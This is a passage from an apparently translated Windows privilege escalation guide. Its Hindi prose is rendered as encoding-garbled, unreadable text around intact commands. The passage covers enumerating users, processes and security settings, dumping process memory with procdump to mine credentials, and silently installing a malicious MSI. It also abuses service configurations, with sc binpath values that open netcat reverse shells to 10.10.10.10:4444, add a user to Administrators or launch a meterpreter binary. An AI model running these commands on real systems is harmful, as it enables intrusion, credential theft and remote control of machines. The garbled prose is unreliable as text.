  • рдпрджрд┐ рдЪреЗрддрд╛рд╡рдиреА File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86' рджрд┐рдЦрд╛рдИ рджреЗрддреА рд╣реИ, рддреЛ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░реЗрдВ рдХрд┐ рдЖрдкрдиреЗ рдкреНрд▓реЗрдЯрдлрд╝реЙрд░реНрдо рдХреЛ x64 рдкрд░ рд╕реЗрдЯ рдХрд┐рдпрд╛ рд╣реИред

MSI рд╕реНрдерд╛рдкрдирд╛

рдкреГрд╖реНрдарднреВрдорд┐ рдореЗрдВ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг .msi рдлрд╝рд╛рдЗрд▓ рдХреА рд╕реНрдерд╛рдкрдирд╛ рдХреЛ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП:

msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi

рдЗрд╕ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХрд╛ рд▓рд╛рдн рдЙрдард╛рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдк рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ: exploit/windows/local/always_install_elevated

рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рдФрд░ рдбрд┐рдЯреЗрдХреНрдЯрд░реНрд╕

рдСрдбрд┐рдЯ рд╕реЗрдЯрд┐рдВрдЧреНрд╕

рдпреЗ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдпрд╣ рддрдп рдХрд░рддреА рд╣реИрдВ рдХрд┐ рдХреНрдпрд╛ рд▓реЙрдЧ рдХрд┐рдпрд╛ рдЬрд╛ рд░рд╣рд╛ рд╣реИ, рдЗрд╕рд▓рд┐рдП рдЖрдкрдХреЛ рдзреНрдпрд╛рди рджреЗрдирд╛ рдЪрд╛рд╣рд┐рдП

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit

WEF

Windows Event Forwarding, рдпрд╣ рдЬрд╛рдирдирд╛ рджрд┐рд▓рдЪрд╕реНрдк рд╣реИ рдХрд┐ рд▓реЙрдЧ рдХрд╣рд╛рдБ рднреЗрдЬреЗ рдЬрд╛рддреЗ рд╣реИрдВ

reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager

LAPS

LAPS рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдкрд╛рд╕рд╡рд░реНрдбреЛрдВ рдХреЗ рдкреНрд░рдмрдВрдзрди рдХреЗ рд▓рд┐рдП рдбрд┐рдЬрд╝рд╛рдЗрди рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдпрд╣ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░рддреЗ рд╣реБрдП рдХрд┐ рдкреНрд░рддреНрдпреЗрдХ рдкрд╛рд╕рд╡рд░реНрдб рд╡рд┐рд╢рд┐рд╖реНрдЯ, рдпрд╛рджреГрдЪреНрдЫрд┐рдХ, рдФрд░ рдирд┐рдпрдорд┐рдд рд░реВрдк рд╕реЗ рдЕрдкрдбреЗрдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ рдЙрди рдХрдВрдкреНрдпреВрдЯрд░реЛрдВ рдкрд░ рдЬреЛ рдПрдХ рдбреЛрдореЗрди рд╕реЗ рдЬреБрдбрд╝реЗ рд╣реИрдВред рдпреЗ рдкрд╛рд╕рд╡рд░реНрдб рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ рд╕реБрд░рдХреНрд╖рд┐рдд рд░реВрдк рд╕реЗ рд╕рдВрдЧреНрд░рд╣реАрдд рд╣реЛрддреЗ рд╣реИрдВ рдФрд░ рдХреЗрд╡рд▓ рдЙрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рджреНрд╡рд╛рд░рд╛ рдПрдХреНрд╕реЗрд╕ рдХрд┐рдП рдЬрд╛ рд╕рдХрддреЗ рд╣реИрдВ рдЬрд┐рдиреНрд╣реЗрдВ ACLs рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдкрд░реНрдпрд╛рдкреНрдд рдЕрдиреБрдорддрд┐рдпрд╛рдБ рджреА рдЧрдИ рд╣реИрдВ, рдЬрд┐рд╕рд╕реЗ рдЙрдиреНрд╣реЗрдВ рдЕрдзрд┐рдХреГрдд рд╣реЛрдиреЗ рдкрд░ рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдкрд╛рд╕рд╡рд░реНрдб рджреЗрдЦрдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рдорд┐рд▓рддреА рд╣реИред

{% content-ref url="../active-directory-methodology/laps.md" %} laps.md {% endcontent-ref %}

WDigest

рдпрджрд┐ рд╕рдХреНрд░рд┐рдп рд╣реИ, рддреЛ рд╕рд╛рджрд╛-рдЯреЗрдХреНрд╕реНрдЯ рдкрд╛рд╕рд╡рд░реНрдб LSASS (рд╕реНрдерд╛рдиреАрдп рд╕реБрд░рдХреНрд╖рд╛ рдкреНрд░рд╛рдзрд┐рдХрд░рдг рдЙрдкрдкреНрд░рдгрд╛рд▓реА рд╕реЗрд╡рд╛) рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рд╣реЛрддреЗ рд╣реИрдВред
WDigest рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдЗрд╕ рдкреГрд╖реНрда рдкрд░.

reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential

LSA рд╕реБрд░рдХреНрд╖рд╛

Windows 8.1 рд╕реЗ рд╢реБрд░реВ рд╣реЛрдХрд░, Microsoft рдиреЗ рд╕реНрдерд╛рдиреАрдп рд╕реБрд░рдХреНрд╖рд╛ рдкреНрд░рд╛рдзрд┐рдХрд░рдг (LSA) рдХреЗ рд▓рд┐рдП рдмреЗрд╣рддрд░ рд╕реБрд░рдХреНрд╖рд╛ рдкреЗрд╢ рдХреА рд╣реИ рддрд╛рдХрд┐ рдЕрд╡рд┐рд╢реНрд╡рд╕рдиреАрдп рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рджреНрд╡рд╛рд░рд╛ рдЗрд╕рдХреЗ рдореЗрдореЛрд░реА рдХреЛ рдкрдврд╝рдиреЗ рдпрд╛ рдХреЛрдб рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рдкреНрд░рдпрд╛рд╕реЛрдВ рдХреЛ рдмреНрд▓реЙрдХ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХреЗ, рдЬрд┐рд╕рд╕реЗ рд╕рд┐рд╕реНрдЯрдо рдХреЛ рдФрд░ рдЕрдзрд┐рдХ рд╕реБрд░рдХреНрд╖рд┐рдд рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХреЗред
LSA рд╕реБрд░рдХреНрд╖рд╛ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдпрд╣рд╛рдБ.

reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL

Credentials Guard

Credential Guard рдХреЛ Windows 10 рдореЗрдВ рдкреЗрд╢ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ред рдЗрд╕рдХрд╛ рдЙрджреНрджреЗрд╢реНрдп рдПрдХ рдбрд┐рд╡рд╛рдЗрд╕ рдкрд░ рд╕рдВрдЧреНрд░рд╣реАрдд рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЛ рдкрд╛рд╕-рде-рд╣реИрд╢ рд╣рдорд▓реЛрдВ рдЬреИрд╕реЗ рдЦрддрд░реЛрдВ рд╕реЗ рд╕реБрд░рдХреНрд╖рд┐рдд рд░рдЦрдирд╛ рд╣реИред| Credentials Guard рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдпрд╣рд╛рдБред

reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags

Cached Credentials

рдбреЛрдореЗрди рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЛ рд╕реНрдерд╛рдиреАрдп рд╕реБрд░рдХреНрд╖рд╛ рдкреНрд░рд╛рдзрд┐рдХрд░рдг (LSA) рджреНрд╡рд╛рд░рд╛ рдкреНрд░рдорд╛рдгрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рдФрд░ рдСрдкрд░реЗрдЯрд┐рдВрдЧ рд╕рд┐рд╕реНрдЯрдо рдХреЗ рдШрдЯрдХреЛрдВ рджреНрд╡рд╛рд░рд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЬрдм рдХрд┐рд╕реА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд▓реЙрдЧрд┐рди рдбреЗрдЯрд╛ рдХреЛ рдПрдХ рдкрдВрдЬреАрдХреГрдд рд╕реБрд░рдХреНрд╖рд╛ рдкреИрдХреЗрдЬ рджреНрд╡рд╛рд░рд╛ рдкреНрд░рдорд╛рдгрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рддреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд▓рд┐рдП рдбреЛрдореЗрди рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдЖрдорддреМрд░ рдкрд░ рд╕реНрдерд╛рдкрд┐рдд рдХрд┐рдП рдЬрд╛рддреЗ рд╣реИрдВред
Cached Credentials рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдпрд╣рд╛рдБ.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT

Users & Groups

Enumerate Users & Groups

рдЖрдкрдХреЛ рдпрд╣ рдЬрд╛рдВрдЪрдирд╛ рдЪрд╛рд╣рд┐рдП рдХрд┐ рдХреНрдпрд╛ рдЖрдк рдЬрд┐рди рд╕рдореВрд╣реЛрдВ рдореЗрдВ рд╢рд╛рдорд┐рд▓ рд╣реИрдВ, рдЙрдирдореЗрдВ рдХреЛрдИ рджрд┐рд▓рдЪрд╕реНрдк рдЕрдиреБрдорддрд┐рдпрд╛рдБ рд╣реИрдВ

# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Privileged groups

рдпрджрд┐ рдЖрдк рдХрд┐рд╕реА рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рд╕рдореВрд╣ рдХрд╛ рд╣рд┐рд╕реНрд╕рд╛ рд╣реИрдВ, рддреЛ рдЖрдк рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдмрдврд╝рд╛рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реЛ рд╕рдХрддреЗ рд╣реИрдВред рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рд╕рдореВрд╣реЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдиреЗрдВ рдФрд░ рдЙрдиреНрд╣реЗрдВ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдмрдврд╝рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдХреИрд╕реЗ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░реЗрдВ рдпрд╣рд╛рдБ:

{% content-ref url="../active-directory-methodology/privileged-groups-and-token-privileges.md" %} privileged-groups-and-token-privileges.md {% endcontent-ref %}

Token manipulation

рдФрд░ рдЕрдзрд┐рдХ рдЬрд╛рдиреЗрдВ рдХрд┐ token рдХреНрдпрд╛ рд╣реИ рдЗрд╕ рдкреГрд╖реНрда рдкрд░: Windows Tokens.
рджрд┐рд▓рдЪрд╕реНрдк tokens рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдиреЗ рдФрд░ рдЙрдиреНрд╣реЗрдВ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдкреГрд╖реНрда рджреЗрдЦреЗрдВ:

{% content-ref url="privilege-escalation-abusing-tokens.md" %} privilege-escalation-abusing-tokens.md {% endcontent-ref %}

Logged users / Sessions

qwinsta
klist sessions

рд╣реЛрдо рдлрд╝реЛрд▓реНрдбрд░

dir C:\Users
Get-ChildItem C:\Users

рдкрд╛рд╕рд╡рд░реНрдб рдиреАрддрд┐

net accounts

рдХреНрд▓рд┐рдкрдмреЛрд░реНрдб рдХреА рд╕рд╛рдордЧреНрд░реА рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ

powershell -command "Get-Clipboard"

рдЪрд▓ рд░рд╣реЗ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдПрдБ

рдлрд╝рд╛рдЗрд▓ рдФрд░ рдлрд╝реЛрд▓реНрдбрд░ рдЕрдиреБрдорддрд┐рдпрд╛рдБ

рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреА рд╕реВрдЪреА рдмрдирд╛рддреЗ рд╕рдордп рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреА рдХрдорд╛рдВрдб рд▓рд╛рдЗрди рдХреЗ рдЕрдВрджрд░ рдкрд╛рд╕рд╡рд░реНрдб рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВред
рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ рдХреНрдпрд╛ рдЖрдк рдХреБрдЫ рдмрд╛рдЗрдирд░реА рдХреЛ рдУрд╡рд░рд░рд╛рдЗрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдпрд╛ рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдмрд╛рдЗрдирд░реА рдлрд╝реЛрд▓реНрдбрд░ рдХреА рд▓рд┐рдЦрдиреЗ рдХреА рдЕрдиреБрдорддрд┐рдпрд╛рдБ рд╣реИрдВ рддрд╛рдХрд┐ рд╕рдВрднрд╛рд╡рд┐рдд DLL Hijacking рд╣рдорд▓реЛрдВ рдХрд╛ рд▓рд╛рдн рдЙрдард╛рдпрд╛ рдЬрд╛ рд╕рдХреЗ:

Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes

#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

рд╣рдореЗрд╢рд╛ рд╕рдВрднрд╛рд╡рд┐рдд electron/cef/chromium debuggers рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ, рдЖрдк рдЗрд╕рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдмрдврд╝рд╛ рд╕рдХрддреЗ рд╣реИрдВ.

рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЗ рдмрд╛рдЗрдирд░реА рдХреА рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреА рдЬрд╛рдВрдЪ рдХрд░рдирд╛

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z"
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)

рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЗ рдмрд╛рдЗрдирд░реА рдХреЗ рдлрд╝реЛрд▓реНрдбрд░реЛрдВ рдХреА рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреА рдЬрд╛рдВрдЪ (DLL Hijacking)

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
todos %username%" && echo.
)

Memory Password mining

рдЖрдк procdump рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рдЪрд▓ рд░рд╣реЗ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХрд╛ рдореЗрдореЛрд░реА рдбрдВрдк рдмрдирд╛ рд╕рдХрддреЗ рд╣реИрдВред FTP рдЬреИрд╕реА рд╕реЗрд╡рд╛рдУрдВ рдореЗрдВ рд╕реНрдореГрддрд┐ рдореЗрдВ рд╕реНрдкрд╖реНрдЯ рдкрд╛рда рдореЗрдВ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рд╣реЛрддреЗ рд╣реИрдВ, рдореЗрдореЛрд░реА рдХреЛ рдбрдВрдк рдХрд░рдиреЗ рдФрд░ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЛ рдкрдврд╝рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВред

procdump.exe -accepteula -ma <proc_name_tasklist>

рдЕрд╕реБрд░рдХреНрд╖рд┐рдд GUI рдРрдкреНрд╕

SYSTEM рдХреЗ рд░реВрдк рдореЗрдВ рдЪрд▓рдиреЗ рд╡рд╛рд▓реЗ рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ CMD рдЙрддреНрдкрдиреНрди рдХрд░рдиреЗ рдпрд╛ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛рдУрдВ рдХреЛ рдмреНрд░рд╛рдЙрдЬрд╝ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗ рд╕рдХрддреЗ рд╣реИрдВред

рдЙрджрд╛рд╣рд░рдг: "Windows Help and Support" (Windows + F1), "command prompt" рдХреЗ рд▓рд┐рдП рдЦреЛрдЬреЗрдВ, "Command Prompt рдЦреЛрд▓рдиреЗ рдХреЗ рд▓рд┐рдП рдХреНрд▓рд┐рдХ рдХрд░реЗрдВ" рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВ

рд╕реЗрд╡рд╛рдПрдБ

рд╕реЗрд╡рд╛рдУрдВ рдХреА рд╕реВрдЪреА рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:

net start
wmic service list brief
sc query
Get-Service

Permissions

рдЖрдк sc рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рд╕реЗрд╡рд╛ рдХреА рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ

sc qc <service_name>

рдпрд╣ рдЕрдиреБрд╢рдВрд╕рд╛ рдХреА рдЬрд╛рддреА рд╣реИ рдХрд┐ рдкреНрд░рддреНрдпреЗрдХ рд╕реЗрд╡рд╛ рдХреЗ рд▓рд┐рдП рдЖрд╡рд╢реНрдпрдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╕реНрддрд░ рдХреА рдЬрд╛рдВрдЪ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП Sysinternals рд╕реЗ рдмрд╛рдЗрдирд░реА accesschk рд╣реЛред

accesschk.exe -ucqv <Service_Name> #Check rights for different groups

рдпрд╣ рдЕрдиреБрд╢рдВрд╕рд╛ рдХреА рдЬрд╛рддреА рд╣реИ рдХрд┐ рдпрд╣ рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ рдХреНрдпрд╛ "рдкреНрд░рдорд╛рдгрд┐рдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛" рдХрд┐рд╕реА рд╕реЗрд╡рд╛ рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version

рдЖрдк accesschk.exe рдХреЛ XP рдХреЗ рд▓рд┐рдП рдпрд╣рд╛рдБ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ

рд╕реЗрд╡рд╛ рд╕рдХреНрд╖рдо рдХрд░реЗрдВ

рдпрджрд┐ рдЖрдкрдХреЛ рдпрд╣ рддреНрд░реБрдЯрд┐ рдорд┐рд▓ рд░рд╣реА рд╣реИ (рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП SSDPSRV рдХреЗ рд╕рд╛рде):

рд╕рд┐рд╕реНрдЯрдо рддреНрд░реБрдЯрд┐ 1058 рд╣реБрдИ рд╣реИ.
рд╕реЗрд╡рд╛ рд╢реБрд░реВ рдирд╣реАрдВ рдХреА рдЬрд╛ рд╕рдХрддреА, рдпрд╛ рддреЛ рдХреНрдпреЛрдВрдХрд┐ рдЗрд╕реЗ рдЕрдХреНрд╖рдо рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ рдпрд╛ рдХреНрдпреЛрдВрдХрд┐ рдЗрд╕рдХреЗ рд╕рд╛рде рдХреЛрдИ рд╕рдХреНрд╖рдо рдЙрдкрдХрд░рдг рдирд╣реАрдВ рд╣реИред

рдЖрдк рдЗрд╕реЗ рд╕рдХреНрд╖рдо рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ

sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""

рдпрд╣ рдзреНрдпрд╛рди рдореЗрдВ рд░рдЦреЗрдВ рдХрд┐ рд╕реЗрд╡рд╛ upnphost SSDPSRV рдкрд░ рдирд┐рд░реНрднрд░ рдХрд░рддреА рд╣реИ (XP SP1 рдХреЗ рд▓рд┐рдП)

рдЗрд╕ рд╕рдорд╕реНрдпрд╛ рдХрд╛ рдПрдХ рдФрд░ рд╕рдорд╛рдзрд╛рди рдпрд╣ рд╣реИ рдХрд┐ рдЪрд▓рд╛рдПрдБ:

sc.exe config usosvc start= auto

рд╕реЗрд╡рд╛ рдмрд╛рдЗрдирд░реА рдкрде рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░реЗрдВ

рдЙрд╕ рдкрд░рд┐рджреГрд╢реНрдп рдореЗрдВ рдЬрд╣рд╛рдВ "рдкреНрд░рдорд╛рдгрд┐рдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛" рд╕рдореВрд╣ рдХреЗ рдкрд╛рд╕ рдПрдХ рд╕реЗрд╡рд╛ рдкрд░ SERVICE_ALL_ACCESS рд╣реИ, рд╕реЗрд╡рд╛ рдХреЗ рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдмрд╛рдЗрдирд░реА рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░рдирд╛ рд╕рдВрднрд╡ рд╣реИред sc рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдФрд░ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП:

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"

рд╕реЗрд╡рд╛ рдкреБрдирдГ рдкреНрд░рд╛рд░рдВрдн рдХрд░реЗрдВ

wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]

Privileges рдХреЛ рд╡рд┐рднрд┐рдиреНрди рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдмрдврд╝рд╛рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ:

  • SERVICE_CHANGE_CONFIG: рд╕реЗрд╡рд╛ рдмрд╛рдЗрдирд░реА рдХреА рдкреБрдирдГ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред
  • WRITE_DAC: рдЕрдиреБрдорддрд┐ рдкреБрдирдГ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХреЛ рд╕рдХреНрд╖рдо рдХрд░рддрд╛ рд╣реИ, рдЬрд┐рд╕рд╕реЗ рд╕реЗрд╡рд╛ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдмрджрд▓рдиреЗ рдХреА рдХреНрд╖рдорддрд╛ рдорд┐рд▓рддреА рд╣реИред
  • WRITE_OWNER: рд╕реНрд╡рд╛рдорд┐рддреНрд╡ рдЕрдзрд┐рдЧреНрд░рд╣рдг рдФрд░ рдЕрдиреБрдорддрд┐ рдкреБрдирдГ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред
  • GENERIC_WRITE: рд╕реЗрд╡рд╛ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдмрджрд▓рдиреЗ рдХреА рдХреНрд╖рдорддрд╛ рдХреЛ рд╡рд┐рд░рд╛рд╕рдд рдореЗрдВ рд▓реЗрддрд╛ рд╣реИред
  • GENERIC_ALL: рд╕реЗрд╡рд╛ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдмрджрд▓рдиреЗ рдХреА рдХреНрд╖рдорддрд╛ рдХреЛ рднреА рд╡рд┐рд░рд╛рд╕рдд рдореЗрдВ рд▓реЗрддрд╛ рд╣реИред

рдЗрд╕ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдФрд░ рд╢реЛрд╖рдг рдХреЗ рд▓рд┐рдП, exploit/windows/local/service_permissions рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред

Services binaries рдХрдордЬреЛрд░ рдЕрдиреБрдорддрд┐рдпрд╛рдБ

рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ рдХреНрдпрд╛ рдЖрдк рдЙрд╕ рдмрд╛рдЗрдирд░реА рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬреЛ рдПрдХ рд╕реЗрд╡рд╛ рджреНрд╡рд╛рд░рд╛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рд╣реЛрддреА рд╣реИ рдпрд╛ рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдЙрд╕ рдлрд╝реЛрд▓реНрдбрд░ рдкрд░ рд▓рд┐рдЦрдиреЗ рдХреА рдЕрдиреБрдорддрд┐рдпрд╛рдБ рд╣реИрдВ рдЬрд╣рд╛рдБ рдмрд╛рдЗрдирд░реА рд╕реНрдерд┐рдд рд╣реИ (DLL Hijacking).
рдЖрдк wmic (system32 рдореЗрдВ рдирд╣реАрдВ) рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╣рд░ рдмрд╛рдЗрдирд░реА рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬреЛ рдПрдХ рд╕реЗрд╡рд╛ рджреНрд╡рд╛рд░рд╛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рд╣реЛрддреА рд╣реИ рдФрд░ рдЕрдкрдиреА рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреА рдЬрд╛рдВрдЪ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП icacls рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt

